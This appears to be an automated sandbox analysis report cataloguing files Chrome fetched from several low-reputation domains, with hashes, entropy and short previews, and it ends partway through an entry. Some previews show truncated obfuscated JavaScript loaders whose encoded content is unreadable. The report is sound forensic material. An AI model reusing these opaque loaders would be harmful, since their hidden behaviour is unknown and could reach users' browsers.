                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATlwF0AaAbwHEBbNAMQC4AzAVzRgBcBLdTdkkEpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KTQAXk5MUUYALQ0AGVEhEiQ0nTRMNEK5NIyIWgBNAHMCkhgSsrlCnxTMdNEomAhGZt73ABZGWgLClBSyCAsIJHpsURhOORg/UVIYFCoIdBA0diWyAA8AYXXNkABJKgamVg5uMpE5EHZmOTQpTh0QJgAIwAZgAHFEhDp2AALI49HRgYx6cq+HwkcR1MAARSmMRIl2ufgAyoFHiw2FweO9Pt9fv9AaCAGxgqGw+H/JFoFFoNEY2zMACOACE8fi9FB2FAnpTXpgaV8fmQkDCUMBIkCip8uGhHmQ7FZ6JqwCAGsZ6EySA0oBANUUyXa/Gh6LgoiQ5FA9JwJEaom6kJwAF7hMjq10kGEu/0wELhIH4rjsPymFBLUTsSwBVicdgptNgFDsDNUALsEBnXOp+jpzMkMANYl2Pz0Mj4sA+FDwRu2ZtkXYduTVgDETNHojbHa7quA3d7CZzJKbIfxuw+s+XJF5VHXLfx2fYO9bJDLFcPCdsVjPgjL26Xu7rUDkV/mKAaHyQSDP+JzICoSAAIoYUC+OwLZAi2SC2FQBY+NWWZoDmcHHuWoGiKWC7hGhLQoKwoG4AArO6haSuEADshFcFQ1j0CChFbiag7+igNhGiQL5vm4Sxul6SBQO2IB6Bq+K4BBUEwUh+5ISeqHoUmmEBLsuEumCRFSmWvoUZwVGDvhdHMNB1FMSxuBsRYHEfvQ3GcLx/GCRE8YkCConQSgsFYZJWHSVJGFIYpxz0PhboWGpcb4Jp2lGnpBmMUUzGgSCpmvu+XEkDxfF+HZDmjM54nuQhMnIRW3lyb5OH+UyQXEepuCjG6lHUUC
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (50508), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):50508
                                                                                                                                                          Entropy (8bit):5.967991341438059
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:qtG6srfi16VuhojsEbg4pVt6Dq+ILgvz4:T6ii166oQivz/+zvz4
                                                                                                                                                          MD5:4B170AA0BEC46F76947485CFBE02A27D
                                                                                                                                                          SHA1:986E2F880A2543BE461AB66D3831006DA930E728
                                                                                                                                                          SHA-256:304B0B648CC11EA239CEA13DAE961BAFC3FC79CCF70BFF347BA743A7CD67F894
                                                                                                                                                          SHA-512:E79BDDD405D91F771C3D5330D75C6435004E341580958BEED945F6CEAAF3CFC37ABE5F313798042211ECEFD5AA07BB7A69AF9790CB30C032CE2DEAA329411B10
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgBYBOAXQBoBvAIgGoAOWgZmoC4AzAVzRgBcBLdJl7k05EAEpKANygAnAAQoA3CgC8XHgKFTqnJCAVJec/n2rLZikWjWU0UALYhW1AF4ALAPoBhAHLU5M5ISFAA5iBIrJRQ7LwgchzcfIJowqJSciC8nHJo1Ap0vLTUgKP6gN4ZgBTqdGjYAAykJYDScoBwKtQAvuRQADYQHlBeACZQSB5JWqnCmdm5+YW0xdSAvwGA+JqAoMqA1CqA6tqAs9aADqZbW4Bk3oAw/2uAN0aALB6AGUaA78qAgAyA0HKASEqA/X4dXb39XmicjuMpIS8aY5PIKRYKQBXyktNrsDscAHQfHp9AZIaAwSIA7RpYGULKguZFEpQmHbHbHM7nQBeXoAeCyRnRR/WxkzxBNmBWJBWhsIpRwZ5DAIHYKCyLKBGXxMzynIWJIq1VotQaJKagFklAVC3igEBocW4yXsmXzCEKmr1Rqy2q4S1NQAvqQKYOh2Pw5M5Bvr0mgQRyTSTALByS0AMSrmlXUQCcyoBZRIFw3iXi1Or1mkBBu9UsJssWZqVFpKIZzNuaDo+sZAXhFbqgvE9Nh9xq5CsVysttMA8PqAWjkYyAYPxHD0a5LpCh+IMFHU1BO0AAyKeYWzYUgSSzyBQgNTN5RGtAKIcjscTtQgGeYNfUABU1Ak5Ez8vKgHozA6AELdADABgBQ5VaAXflAJqudEw5+oB4gAA/NQbCSCSgCy8oA8Dp7DG/BhPwvBRMmOJenWRJygUFQPlsJyvoAfT6AHYegAMSvMzYlHsJa9rqSCpMhySobW6a+g295kbmBSAPMKgAEvqR5qFlx3ECiAfb8N0NboTeWH3oAkOaABKmj6AHUJgCN3sJAAe1Yoaykl+tJd7yY+gDhpoAb3ICr24QuFpQI6VyCjYYAf2qAOJOZlJgx2nMfWmF2fegAAcoAVHLyYAPApmRAEkeR
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16228
                                                                                                                                                          Entropy (8bit):5.053983434030325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:g9UztP6/SOOmz6C5ckwgaCPrXfiAbwJuKejbMFo/z95N0Db23//70Lonier:g9UU/fOmzwCTX+er
                                                                                                                                                          MD5:1AD1EE321134B2A6630D60F75DF1F7A2
                                                                                                                                                          SHA1:5E64551B37AD207037A884091FA66EBE8183AC2E
                                                                                                                                                          SHA-256:E93D060958E7643D5005229C5BBA7AD7B4E40E8C912B06609876729871C4E42E
                                                                                                                                                          SHA-512:9C1178DB50353F24E7B551ED98D016AFE15372C7F841BC0C3F268C67E04592372AA6BC55FED7AEE624F25BEF24446A0205ACAEDC8A0964E81B9EA2AC23D4E869
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/wasm_exec.js
                                                                                                                                                          Preview:// Copyright 2018 The Go Authors. All rights reserved..// Use of this source code is governed by a BSD-style.// license that can be found in the LICENSE file..//.// This file has been modified for use by the TinyGo compiler...(() => {..// Map multiple JavaScript environments to a single common API,..// preferring web standards over Node.js API...//..// Environments considered:..// - Browsers..// - Node.js..// - Electron..// - Parcel...if (typeof global !== "undefined") {...// global already exists..} else if (typeof window !== "undefined") {...window.global = window;..} else if (typeof self !== "undefined") {...self.global = self;..} else {...throw new Error("cannot export Go (neither global, window nor self is defined)");..}...if (!global.require && typeof require !== "undefined") {...global.require = require;..}...if (!global.fs && global.require) {...global.fs = require("fs");..}...const enosys = () => {...const err = new Error("not implemented");...err.code = "ENOSYS";...return err
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 20:17:21], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):45789
                                                                                                                                                          Entropy (8bit):7.563586965229121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ROYyLpPD0PlYyLpPD8sopqVjYydl98NXrHK/ELcoMbacIU3hSom:MXpPDkXpPD8sjX98Vq/ELco8I4hTm
                                                                                                                                                          MD5:1DE7D7A093F4F2F9BC9CEF25C9E9291F
                                                                                                                                                          SHA1:F8CEF7AECD2795DC71D2128F4240C10CD0F47E62
                                                                                                                                                          SHA-256:3E2A9937651D34FD33BC6A1BF0EC6EF953E012D497AFCAF70BE22AE006A3E342
                                                                                                                                                          SHA-512:A48871EA2F2122AC264FDCCAEEFA1D52D9434C0DF72E9F5A913896F997C779E87C34B6E8DEA694CE7206E571B1D639B240A3ED1DAE875770B2321B334BE4B2D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 20:17:21..........................N...........Q...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):151324
                                                                                                                                                          Entropy (8bit):5.961896786964676
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:VD6KReWP4vtuGy4eSm0zapcJJUfyXx3O4/wLyrXk66RC0s:VD6KMKUuAFmwapcJJUfyXxeerXk6QC0s
                                                                                                                                                          MD5:CA7749BA7912EB65B729E869BB83ACD9
                                                                                                                                                          SHA1:4CE57A051731944EAD05072DCE1F47EAE7787170
                                                                                                                                                          SHA-256:DB3F625270BDB9B6EC85570C242CB9FE63D0ECBEBF003F5E043A5AFADD03BC96
                                                                                                                                                          SHA-512:05DB56552FFBF63C9D8D7061BFB13A7FD7A937BBC52BBA33C19DACBD47DB95A958B482FF47B696712F3915D49E7A4BFF4679E1508ED0ACB8A019E20D9413E8E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/vendor.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhRuUyYxT1xrFF1sEkCogBMQAA8AeVYyKF0PDxQAMnPcAHo8da3dg8xcMgBaHwAeLz8A4JoggBiACpMFAAD5gjxTABy0IUbgWKDE1ioAEEFAooABPOIUB77VhJNqpQQZLI5PJQAD8KECUAgEAANliiiUjgpouwALYgNDcJBiCFeZgFbjFUpCLScnl8pB3apVGq0ACiAGZmkSUh1hKIJNxArsICgFPyTlMwgAOOiM9ytLUGMnZXIyADsHl0ezAACsQDxAttWFEQOYFCgICATSyKEqoLjollNe0HRRMk68i7KmI6Yrag1uDQWskk4Idd0qFJZPIlANNNo9FMTBYrDYRi7ogANLzNlZTPYuACSTmbxymLr2uHmZCQIwwhQAElYfkFzP9AgAlUIhlBckogXGBtBQRnMxMk9IUWsyEC6KCs0q8YKhnfSCG0rfPkDWNC6Kh2pNUXRdG4LFwxQVgZG4PxyWdMUSkCMVeUwNAqT/ElulTCk5EwERuEwZF4MKRDUIER1MLQRVmCEZDiIMdDoLyJBsLKPCswQgwaLwigxVDYAZHI6pKIVapagALQaBBC2JbUugkS960MRk9jQCTfH1Q1jVNDjOl1PFWACUkyHUFBeE2GQvEA3RPwwmDVCQYBeG4GBCiQiQYCgXpcGYay8g4ui0wgwI3OPJjxHKVQ3N6OgvPomRfLIBRSJgwKj0ZEL4uqcL3NkVVov8uKFBsRK8n1ILUq6eLCsqbzYqLEkioC+k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5406
                                                                                                                                                          Entropy (8bit):7.875836177006229
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFqu2hiwWx/nqMtwje6LcBlKgEBkTnieTOzUXAaZFszy3d2FcOZQ:n3wWx/quw6VIMeiNZEQ
                                                                                                                                                          MD5:0828B6BE9143DDF7D21123D39FF5A13C
                                                                                                                                                          SHA1:008BE056809423055B06BB6705A5C8A990706ED1
                                                                                                                                                          SHA-256:767DCEC9219465104F17C5D75389DE4AE5EEC8ED85CDD4725C7684707F2C9C1D
                                                                                                                                                          SHA-512:E09959DFF2519DCAD30B07C4A1399E25B96183E29AA1CCB3173FF9A7C27C866D59EFBF072F1D85B5F3C807ABDB4BC7617E6CBEB5506575C77F849BA2947C1B71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:0775CB5AF77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:0775CB59F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<p....>IDATx..Z.t....o{..$!$a..a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1200x597, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):50894
                                                                                                                                                          Entropy (8bit):7.8283287724968185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:LueHiG76uKbBo7dZw4ZuvjLBjbONixS5ffDYMBL0HQy32p7/Ff3B1VIN:LHCG76uZAvV+lLYMBEQymp7/h3Fe
                                                                                                                                                          MD5:D7A708C815B447A13FFEC99050B7D362
                                                                                                                                                          SHA1:209C52FB1E014284DFA9C7CE36640F86F9BAA96B
                                                                                                                                                          SHA-256:3B84BBE81B33F9411A58FCA3F68380DA11B6B9683ADDA2DCA95C6A1E7357A106
                                                                                                                                                          SHA-512:CFE8A7EBC89830D308EE553C7425240D5B8218619829C48541A4BE6927AABA1D643DE94CF54D3CDEF7A1D98B020EBD30C2F29254D1DBB3E3E56AEC0AF2C9FBC3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................U..................................................................................!..1AQaq............T..4."R.S$32B.#CDb...c.d.....................1!A.Q..aqR.......23S."Br#............?.._N..W#...{i.}.}.&.....a.*4b...A...>..a...#a..&.Z..i...i;.}..E....k.^D.=#...U}......S..d...[...=....s...\.|.}...?._..[.7]}#..&.^.w.......w..u..+_..3k........w}H.i....>O...l...............i..\.~_.oz.......w.o_.FO.OI..>_....g.......e..r....#/...:.E........~J...=.........:.GY.|....V..........|_....|..?.t[.._.G.{...~/....:.......V..|..|.......F...........'......W.....?......~...._h......7...tY.~d.......V.m..?.....k.9......U...7..+..w....~.._h......>O..WJ..6..._.{...~.....;k...g..._..o....o...c..g..|?.....k.Y.......t{.;.L..{.....=..E.>.._h......~L....._?..3.....~./.....G._..k..O.._..o..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 25 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1545
                                                                                                                                                          Entropy (8bit):7.117957482446824
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:w1hfvWwjx82lY2T3JVFaUyJ3VDA2GKtcZmcO8c7AD+zWLaYom4eU:OANn2NOJ3dXOHO8c71zWO+4l
                                                                                                                                                          MD5:1168DA354E0C658EA9088C37BB2311AF
                                                                                                                                                          SHA1:3E05E74F30E98AE5033754795D4D9877706BD26B
                                                                                                                                                          SHA-256:607825C41FD77E5C4229E2A42267C8D9F59FEE416D35EA0A0BDA7888B2E5DE71
                                                                                                                                                          SHA-512:119FCFB75754C0504334D72780537319D7C440687883B1D52F86CDE5D2A8314E4DFC770A9D2F05D57EC4BBA97212249AEAD83AA9667910C84CB5D5AA7C604AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv2.png
                                                                                                                                                          Preview:.PNG........IHDR.............B}......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:5BD30C4650A211E794CFD2438EE3747C" xmpMM:DocumentID="xmp.did:5BD30C4750A211E794CFD2438EE3747C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5BD30C4450A211E794CFD2438EE3747C" stRef:documentID="xmp.did:5BD30C4550A211E794CFD2438EE3747C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..4....yIDATx..Oh.p...i.4.b..N/..]6D.... .x..(..d7.Q..AA\wS.!..EA..Qq.z.."u..SOMYl...R.4I.<..........H.gO.&
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1940
                                                                                                                                                          Entropy (8bit):7.388563089427014
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ozNn28cVtdvJ36GTNccFAe4wMNMVh8+YrFJ69:y2bVtqGTNhK1NMVwW9
                                                                                                                                                          MD5:8508CDBD5AEDE45170E421C01377938D
                                                                                                                                                          SHA1:31FA6722AE55A6625A996B7192D839B3AC2C64D9
                                                                                                                                                          SHA-256:EE2D3E42D2BD093FC849052C816A81778DA615B0B96871788F7D1C6D5AE7DAE5
                                                                                                                                                          SHA-512:5A4C6B47D5E57DE6EDB5CEF5BA85E5EF93ACE723F1961E5705BB603F736B2F22859E49D17EDEA6FD5B24E8F53F020AA4165F6FC5DBC7871FA25FD533E10B64C5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C52714971EC611EE8653DFFA3047B159" xmpMM:DocumentID="xmp.did:C52714981EC611EE8653DFFA3047B159"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C52714951EC611EE8653DFFA3047B159" stRef:documentID="xmp.did:C52714961EC611EE8653DFFA3047B159"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>k..3....IDATx...k.A..:.$F....E.#.. .........$.M..A..=y...rq..*.........F....F..Mb&.t...:..T.t'....R.5_.z...J)1
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7648), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7648
                                                                                                                                                          Entropy (8bit):5.937033305798227
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VSu4qFxjbfaFyVcN5iHKxeNfibCdutZe2BVokOYnCPpLWSNtR:VX4q/r6t5iPfiOA72PR3n
                                                                                                                                                          MD5:57648F1C0BE56658A512181CD40C0958
                                                                                                                                                          SHA1:19178FEDF0FA81538C378E1E4DD944F6618595F5
                                                                                                                                                          SHA-256:2B536CD8BAE2F58B12A4BB816886E866EEFB2B9DFBB0F9399DCF9019184CF22B
                                                                                                                                                          SHA-512:92B79D9E3BBCCC222E3007D75CB845D60E798F08B7B0CACE50A7278CB8AFE4CDB3B6C983A30BFC5ED01E108366E763D8128E6DCF43B6F4489A6CB78D5B284E77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/noticeBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IPR0AG5Qk9wg7ACEAAxWUiULqjlo2rrrMBCcpsRQh/TrgsEAFudagnJRUFLEKFfMrOeqmrS1KD8KBccIeKIyVQgfjcVRoWjAJrNVRIdj0ehWGwwKFAkC1UEpEQyXY5fiafh3QRIcSaRFoWooYByADKAGkAJL2Eo6RgAQQqAHNTLo5AB6egAahAEvooqa9UUcgqSFMcgpICibgiIm8sjkdORWhA+qRnSQWxs3AggP4eIJ2ohskpSDkABJmop+AAVIpwTBa8GYYlQPZkukMplsznc3S1CoVXnC+hiyX8GWiyaCAV3DSZ+qqJUqqRqu4a/1g1L8GRIIO6ADEBs6qsz2f4zLznUwtEEtoAtuwAKwXbj8FAAdUEtQpawoxCQHbGcxWs/nk5AIxDAqa7BIMCQSAAolAkE0BWiQMeZuJj6e0ZnmiHZkgOnayOt1sRoFkVrgQGRh6OawfpMKDtEBxBwCAXStMMqKrLOMDoAUKCTHBs4QFCcwABL8L2kxorMHr8DheEEcQ6j4fBFyAhAQhLlhIBZjmM7EEu6hFIs4FsUIMCLAxTH8OwFBkEOcxenc3C9mAE5TncQnvsQFKSWA7J9kJxAwLCUJoPwwRQAKnTBCgJ7gmivaTrU0yzOg7ZrqoAAyKBQPiAapNWtb0A2pqqKqUK9igS4AMKTMeNb0DAzIALSUrU9RoKYmLWElmIaf82n5vagbBqG5LOjS8iutiF62ge0y9hqYiCOScj9NkkycDVM
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3818
                                                                                                                                                          Entropy (8bit):7.792939592952148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:t2Hg2TzeSkYTNtJqR7nGLoDS+u1Me2Zm6s7:Mg+zrkIiFX2+u1mTs7
                                                                                                                                                          MD5:062B515618ADDEEC46DC8A42E66067F3
                                                                                                                                                          SHA1:79B96AB9EF2C1742366D44D365418D714BF66FE4
                                                                                                                                                          SHA-256:7F9E6D3150BF22C4F488EC26E1BB665CF9FCC2A71CCC9E71685A826B832D7C06
                                                                                                                                                          SHA-512:00DAD0FDDF2758644A0276FB8783E1048FFC8014578F8B64F6F707AF7C6EDF84783FD2ECD9D100CDBE49BAC081F6AE7BA41B5388B2345A6E3223B4146C4EFD04
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_ps_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.eda2b3fac, 2021/11/17-17:23:19 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.1 (Windows)" xmpMM:InstanceID="xmp.iid:B4BB134B800311EC94A4D83734F417E5" xmpMM:DocumentID="xmp.did:B4BB134C800311EC94A4D83734F417E5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B4BB1349800311EC94A4D83734F417E5" stRef:documentID="xmp.did:B4BB134A800311EC94A4D83734F417E5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.f.l...ZIDATx...t........n..n..Cv..!A.@Yd.`...q.zZ..N.:..ZE..A..*.X;R.....D%.BLX......$7...$w.y....9=g.s..-....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1126
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):739
                                                                                                                                                          Entropy (8bit):7.700704690333167
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XS9KZpnPychqTA273nOykywO0WSTn84VGM/qaN7q8tcDl802mvcV8pD/:XS9WtPy6JGXwOCD8LAN7adOVu7
                                                                                                                                                          MD5:EB84DDBE092519A3C7FD330D2D225EA5
                                                                                                                                                          SHA1:886729438EC5CC97D98595714561FEB50F6DBBA9
                                                                                                                                                          SHA-256:5E2FA38CF6F0E070EF7DA76E3F73879236658B8058EA6C03DAAF22E5E1933BD6
                                                                                                                                                          SHA-512:5A2140CC77E360E26FF98170E306A60C24D5D5780BB0D40BAD72F6A6629F662722D7D1E5B99EC722E9576BB16F0DB9137527F28B23B09A1DE1A625999D6141AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-341.dalianjrkj.com:1586/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221
                                                                                                                                                          Preview:..........\.Mo.0...|.(..RH.t./..Zm......`........*.=p..&M.....ko.L.1A?.Z.o..4-..,?......ONM.P.*.e...l...b/aXQ..2...-..b.G.!K..h..?4....X..2..&l....|pX..D..H.ID...E.=\.G... H...h..K..y.1.Q9 [i..;("....+j6.)..+...u.GB..;.....zauS..R.+...H..1;".%E6.3.>....D.Gr%[.1.p....L..Z...)fn..Q.8....p.....(H,h.......z..^..|Z,...k..".]\..I..n..u].........e.<B.u..^.l.._....K........~u=..........+.rX2...m@.B.]P[r..$.}..M...eR.<..P.H'JQ.H.y:......uC.M.2C.P...G.Hw..>L..V5s~/.c.T./...\..I<....0(..n.}.}....^...~:...B.H;..GD..qB1..n..~.d.N..z....Q.sl.U.j..9.............3.)..5.GC..n...^....P.T];fAf..T^"3Y..CU.%g..............WW....o..g.P..9>....$x...\..^u..k7...#..........t.c....b....dv.."@1....$."B................+.pf...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):240064
                                                                                                                                                          Entropy (8bit):5.999848834466704
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:7P+xNttMp/skuIKOkJlQA3s/OSWQXxheaYvs9q0W:7P+xNPe/skuIKOkJlT3U5NGm9q0W
                                                                                                                                                          MD5:07494A80B182D0BA087EBB2D664E51A0
                                                                                                                                                          SHA1:0FB27FB19950DEBC5ED54BC6956F6016D45A5C0E
                                                                                                                                                          SHA-256:37A852854C912B6C06040CDC8CB22DF2157DFADF796B70D7EBD5EBD441E80ABD
